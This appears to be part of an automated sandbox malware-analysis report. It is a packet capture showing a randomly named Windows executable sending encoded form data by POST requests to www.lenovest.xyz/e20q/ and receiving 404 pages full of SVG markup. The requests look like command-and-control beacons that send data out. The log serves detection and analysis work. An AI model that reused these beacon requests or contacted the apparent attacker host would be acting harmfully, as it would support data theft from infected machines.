                                                                            Jun 19, 2024 22:40:08.470953941 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                            Jun 19, 2024 22:40:08.470988035 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                            Jun 19, 2024 22:40:08.471021891 CEST1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                            Jun 19, 2024 22:40:08.471056938 CEST1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                                            Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                                            Jun 19, 2024 22:40:08.471091986 CEST1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                                            Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                                            Jun 19, 2024 22:40:08.471126080 CEST1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                                            Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                                            Jun 19, 2024 22:40:08.471160889 CEST1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                                            Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                            Jun 19, 2024 22:40:08.471196890 CEST556INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                                            Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                                            Jun 19, 2024 22:40:08.476663113 CEST1236INData Raw: 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70
                                                                            Data Ascii: 000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4570" d="m 325,163.45184 c 1.66722,0.6259


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.449762162.0.213.94805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:10.387191057 CEST710OUTPOST /e20q/ HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.lenovest.xyz
                                                                            Referer: http://www.lenovest.xyz/e20q/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 44 4b 32 75 4d 6c 61 49 5a 42 67 38 34 57 73 30 36 31 33 42 2f 4f 34 49 62 32 39 38 53 51 41 42 62 65 38 4f 4e 66 33 61 59 68 6d 72 37 48 47 73 48 35 4f 4a 4d 65 37 68 5a 56 50 32 33 59 68 33 65 72 4e 72 63 5a 76 46 49 34 72 6c 61 47 70 4b 53 4e 61 46 57 4c 69 76 52 42 69 79 44 77 6a 4d 69 34 6d 43 51 41 38 51 37 43 53 47 64 6d 63 62 61 61 70 4e 6c 39 30 33 6a 41 6d 69 52 69 70 64 35 4a 75 75 77 74 63 58 30 43 75 48 44 38 47 33 65 42 44 32 43 6f 33 6e 66 44 6a 46 76 47 54 53 34 7a 43 64 70 66 2b 36 4c 30 4d 49 43 30 75 65 57 79 4a 53 69 46 4f 34 54 4e 6b 46 5a 6d 71 49 6b 57 4c 4d 59 71 55 53 6c 7a 67 3d
                                                                            Data Ascii: tF1tk6=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQABbe8ONf3aYhmr7HGsH5OJMe7hZVP23Yh3erNrcZvFI4rlaGpKSNaFWLivRBiyDwjMi4mCQA8Q7CSGdmcbaapNl903jAmiRipd5JuuwtcX0CuHD8G3eBD2Co3nfDjFvGTS4zCdpf+6L0MIC0ueWyJSiFO4TNkFZmqIkWLMYqUSlzg=
                                                                            Jun 19, 2024 22:40:10.974095106 CEST1236INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:40:10 GMT
                                                                            Server: Apache
                                                                            Content-Length: 16052
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                            Jun 19, 2024 22:40:10.974159956 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                            Jun 19, 2024 22:40:10.974195957 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                            Jun 19, 2024 22:40:10.974229097 CEST672INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                            Jun 19, 2024 22:40:10.974262953 CEST1236INData Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30
                                                                            Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
                                                                            Jun 19, 2024 22:40:10.974296093 CEST1236INData Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39
                                                                            Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                            Jun 19, 2024 22:40:10.974332094 CEST1236INData Raw: 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 37 22 0a 20 20 20
                                                                            Data Ascii: inejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.82
                                                                            Jun 19, 2024 22:40:10.974370003 CEST672INData Raw: 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38
                                                                            Data Ascii: -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767"
                                                                            Jun 19, 2024 22:40:10.974613905 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                            Jun 19, 2024 22:40:10.974684000 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                            Jun 19, 2024 22:40:10.980103970 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.449763162.0.213.94805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:40:12.924845934 CEST10792OUTPOST /e20q/ HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.lenovest.xyz
                                                                            Referer: http://www.lenovest.xyz/e20q/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 44 4b 32 75 4d 6c 61 49 5a 42 67 38 34 57 73 30 36 31 33 42 2f 4f 34 49 62 32 39 38 53 51 49 42 62 72 67 4f 63 49 44 61 5a 68 6d 72 79 6e 47 74 48 35 4f 75 4d 65 6a 66 5a 56 53 44 33 61 5a 33 65 4f 5a 72 4a 59 76 46 43 34 72 6c 52 6d 70 48 4e 64 61 71 57 4c 79 72 52 46 4f 79 44 77 6a 4d 69 2b 43 43 5a 7a 6b 51 39 43 53 5a 61 6d 63 74 65 61 70 70 6c 39 73 6e 6a 41 6a 41 45 43 4a 64 35 6f 53 75 78 62 41 58 38 43 75 42 4e 63 47 76 65 42 65 32 43 6f 36 4c 66 44 48 76 76 42 6a 53 31 33 37 61 2b 37 79 67 5a 53 4d 72 47 6e 43 49 59 46 64 54 37 45 2b 32 59 4d 31 63 47 6c 65 69 70 48 65 39 48 49 34 6b 7a 6c 47 4d 4f 6e 62 54 4b 66 30 4c 75 72 2b 49 51 4d 4b 76 6c 42 45 62 73 34 5a 56 4e 30 34 6e 62 56 44 44 47 68 31 75 38 6b 64 55 45 62 4c 46 6f 38 2f 71 64 47 2b 47 48 6a 38 37 70 6c 42 65 39 2f 49 4f 65 44 49 64 51 6d 6d 33 41 4d 73 61 55 63 4d 43 34 51 33 6a 6e 4b 6e 39 6c 70 33 6b 7a 59 68 57 77 56 4a 4b 61 6f 31 56 48 78 62 76 55 70 4c 5a 38 44 6c [TRUNCATED]
                                                                            Data Ascii: tF1tk6=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQIBbrgOcIDaZhmrynGtH5OuMejfZVSD3aZ3eOZrJYvFC4rlRmpHNdaqWLyrRFOyDwjMi+CCZzkQ9CSZamcteappl9snjAjAECJd5oSuxbAX8CuBNcGveBe2Co6LfDHvvBjS137a+7ygZSMrGnCIYFdT7E+2YM1cGleipHe9HI4kzlGMOnbTKf0Lur+IQMKvlBEbs4ZVN04nbVDDGh1u8kdUEbLFo8/qdG+GHj87plBe9/IOeDIdQmm3AMsaUcMC4Q3jnKn9lp3kzYhWwVJKao1VHxbvUpLZ8Dl0e5Hcouz7DydbO+jxbKDjUsf+HJStGJgh2305+KgQpjTC3l77hfSXLClrziTjr1YfABCOv/b3+mH7LqovZwkZEVFDDtEyX6jLCDC5H8Cx/bP8UX4+UofenTyQfbCabNCixXggdQaV0JS2g2qcG9Yo3oQgFDR7yAWxa6hszmhaMufl8Snyrr4fIH2hwclsNG21Odyto/KgqCd+p1AoSt3s4zobj0BCrXTNAz+Bj/7gA05TWlnvx8VyjNt7V+GoeTKQ7uzSQnym1zm03M3Go9BvNdvWwzFHqTIO5k/OSGozYRBZpUBiF1zEIwQlu/tnsmQe7NNL0saWtPcJ026WkbKT0zhwrUl0ywW2Z9DKXPPAdcSeFbuLM+thqg3lZ1lB3klHUDAHtX5h5ZafCpysLvjFy6x1r0LKTIyQ4L7ViIPYw2uoljxhJceosFyvtHXXoKRLJnbgR+ZUQmxnraIE6wAvdXB/IrnXSlI7GcDMzBdMlCWqlNj/IkadnaAbDprS26/TlguRw8OsPunfSB9gtxuIVxJIdc80EhjXlEQhZGfyO1uH7XFuYVpgyFue0QcDoNMAerARaz1DhVCZ6hXEEsSYUSBAxAoyxHmtzHracJl9nmCsUyUzTRcDr8F9o06PQSpAk2tXLudGeOV0kMHZpOZlggk38AGjgNsZJ [TRUNCATED]
                                                                            Jun 19, 2024 22:40:13.718149900 CEST1236INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:40:13 GMT
                                                                            Server: Apache
                                                                            Content-Length: 16052
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                            Jun 19, 2024 22:40:13.718221903 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                            Jun 19, 2024 22:40:13.718257904 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                            Jun 19, 2024 22:40:13.718291044 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                                            Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                                            Jun 19, 2024 22:40:13.718326092 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                                            Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                                            Jun 19, 2024 22:40:13.718359947 CEST1236INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                                            Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                                            Jun 19, 2024 22:40:13.718426943 CEST1236INData Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                                                                            Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
